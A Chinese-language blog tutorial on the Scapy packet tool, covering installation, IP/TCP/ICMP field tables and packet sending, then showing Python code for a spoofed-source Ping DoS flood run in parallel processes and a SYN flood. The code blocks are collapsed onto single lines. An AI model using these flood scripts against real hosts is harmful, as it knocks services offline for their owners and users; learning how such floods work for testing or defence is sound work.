介绍

首先给出官网。
Scapy是用Python编写的交互式数据包处理工具。
使用Scapy可以伪造或解码各种协议的数据包，在线发送它们，捕获它们，匹配请求和答复等等。

下载

由于是Python编写的，使用pip install进行安装，这里使用清华源加速。

pip3 install scapy -i https://pypi.tuna.tsinghua.edu.cn/simple

直接使用scapy命令打开，若显示无法导入相关库，则对其中缺失的相关包进行安装。

INFO: Can't import matplotlib. Won't be able to plot.
INFO: Can't import PyX. Won't be able to use psdump() or pdfdump().

使用

包配置

使用TCP/IP协议构造基本数据包，这里调用了Scapy的内置函数IP()和TCP()。

pkt = IP()/TCP()

注意：IP()一定在TCP()之前。

IP()参数解析

参数	含义	默认值
version	版本	4
ihl	报头长度	None
tos	服务类型	0x0
len	报文总长度	None
id	标识符	1
flags	标记	NULL
frag	段偏移	0
ttl	生存周期	64
proto	协议	tcp
chksum	校验和	None
src	源`IP`地址	127.0.0.1
dst	目的`IP`地址	127.0.0.1

TCP()参数解析

参数	含义	默认值
sport	源端口	ftp_data
dport	目的端口	http
seq	序号	0
ack	确认号	0
dataofs	数据偏移	None
reserved	保留位	0
flags	控制功能	S
window	窗口大小	8192
chksum	校验和	None
urgptr	紧急指针	0
options	选项	[]

根据需求设置数据包之后，使用{PKT_NAME}.show()可以查看报文信息。

###[ IP ]### version= 4ihl= Nonetos= 0x0len= Noneid= 1flags= frag= 0ttl= 64proto= tcpchksum= Nonesrc= 192.168.239.128dst= 110.242.68.4\options\
###[ TCP ]### sport= ftp_datadport= httpseq= 0ack= 0dataofs= Nonereserved= 0flags= Swindow= 8192chksum= Noneurgptr= 0options= []

包发送

使用send()函数发送数据包，该函数不返回响应。

>>> send(pkt)
.
Sent 1 packets.

sendp()等加了p的函数作用于第二层，发送的是帧。

sr()和sr1()发送数据包并接收响应。

>>> res, unans = sr(pkt)
Begin emission:
Finished sending 1 packets.
*
Received 1 packets, got 1 answers, remaining 0 packets
>>> res
<Results: TCP:1 UDP:0 ICMP:0 Other:0>
>>> unans
<Unanswered: TCP:0 UDP:0 ICMP:0 Other:0>

sr()和sr1()的区别在于，sr1()只有一个返回值（Results）。

Ping DoS

使用Ping进行DoS攻击时，由于Ping使用的是ICMP协议，下面给出ICMP()的参数解析。

ICMP()参数解析

参数	含义	默认值
type	消息类型	echo-request
code	代码	0
chksum	校验和	None
id	标识	0x0
seq	序号	0x0

Ping攻击报文的设置比较简单，通过随机配置ICMP()也能实现Ping DoS的攻击效果。
结合IP()设置目标主机IP。

#判断是否随机源
if random_source ==True:#随机构造IPsource_ip = Random_IP()ip_proto = IP(src = source_ip,dst = host,ttl = 1,id = id_ip)
else:ip_proto = IP(dst = host,ttl = 1,id = id_ip)#id_ping和seq_ping均为随机配置icmp_proto = ICMP(id = id_ping,seq = seq_ping)#设置数据内容data = b'ping dos'pkt = ip_proto / icmp_proto / data *100send(pkt)

在这基础上，要想达到效果，我们需要增加攻击报文的量。
通过循环重复攻击之外，我们采用多进程并发的方式增大攻击频率。

#processes设置太高会影响本机运作，太低起不到干扰效果
def ping_concurrent(host, processes=5, random_source=True):#创建进程池pool = multiprocessing.Pool(processes=processes)while True:try:#选择进程的任务和参数pool.apply_async(ping_times, (host, random_source))except KeyboardInterrupt:pool.terminate()

SYN_Flood

多进程和重复次数的性质和Ping DoS一致，这里主要的区别在于把ICMP协议换成了TCP协议。

# Randomly generate source port
src_port = randint(1,65535)tcp_proto = TCP(sport = src_port,dport = port,flags = "S")pkt = ip_proto / tcp_proto

其中flags变量表示了TCP三次握手的不同状态，S表示SYN。

Scapy功能介绍以及应用相关推荐

HiCar基本功能介绍
HiCar基本功能介绍基本概述一方面,基于操作系统超强的分布式能力,HUAWEI HiCar通过手机和汽车之间的连接,基于三层标准与能力,构建手机和汽车互助资源池,把手机的服务生态延伸到车内,实现 ...
vs2008\drivers\opengl_2.h.c_opengl基本功能介绍+示例
/**** openGL上的画点函数即基本功能介绍 *****/ /***************************************************************** ...
大白菜软件常用功能介绍
大白菜软件常用功能介绍作者:尹正杰版权声明:原创作品,谢绝转载!否则将追究法律责任. 一.刻录光盘介绍 1.选择你需要的刻录的光盘 2.点击刻录光盘 3.确认之后点击刻录 4.等待刻录完成转载于 ...
Redis Manager 主要功能介绍
GitHub: github.com/ngbdf/redis- Redis Manager 是 Redis 一站式管理平台,支持集群的创建.管理.监控和报警. 集群创建:包含了三种方式 Docker. ...
键盘上的F1,F2,……，F12的各功能介绍
键盘上的F1,F2,--,F12的各功能介绍一般情况下,键盘上有12个功能键,统称为Fn键. F1:如果我们在一个选定的程序或页面中并且需要帮助,那么请按下F1.如果现在不是处在任何程序中,而是处在 ...
TEASOFT辅助服务程序UDPCopy 功能介绍
简介: 借助于嵌入式工控机作为音乐伺服器,完成背景音乐输出控制.本文总结了TEASOFT相应的控制命令.除了现在的功能之外,还需要进一步补充MUSIC嵌套功能. 关键词: MUSIC,TEASOFT ...
iOS Simulator功能介绍关于Xamarin IOS开发
iOS Simulator功能介绍关于Xamarin IOS开发 iOS Simulator功能介绍在图1.38所示的运行效果中,所见到的类似于手机的模型就是iOS Simulator.在没有iPh ...
Istio所有模块、Service、Pod的功能介绍
[TOC] Istio所有模块.Service.Pod的功能介绍 Istio模块 Proxy(Envoy) 流量代理,不可缺少 Pilot 服务发现.流量管理.智能路由等 Mixer 遥测相关 Cit ...
grep 模糊匹配_vim 的模糊查找插件 LeaderF 新功能介绍（二）
前言本文介绍自<vim 的模糊查找插件 LeaderF 新功能介绍>以后,LeaderF增加的一些新的功能. 异步grep Leaderf rg 此功能已经在<vim的grep插件 ...

Scapy功能介绍以及应用

介绍

下载

使用

包配置

包发送

Ping DoS

SYN_Flood

Scapy功能介绍以及应用相关推荐

最新文章

热门文章